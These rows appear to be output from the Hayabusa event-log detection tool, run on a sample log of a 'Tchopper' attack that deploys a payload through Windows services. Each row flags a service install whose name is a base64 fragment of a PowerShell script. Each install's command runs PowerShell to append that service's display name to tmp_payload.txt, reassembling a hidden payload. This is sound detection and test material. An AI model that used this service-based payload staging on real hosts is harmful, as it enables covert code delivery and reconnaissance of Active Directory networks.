+2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
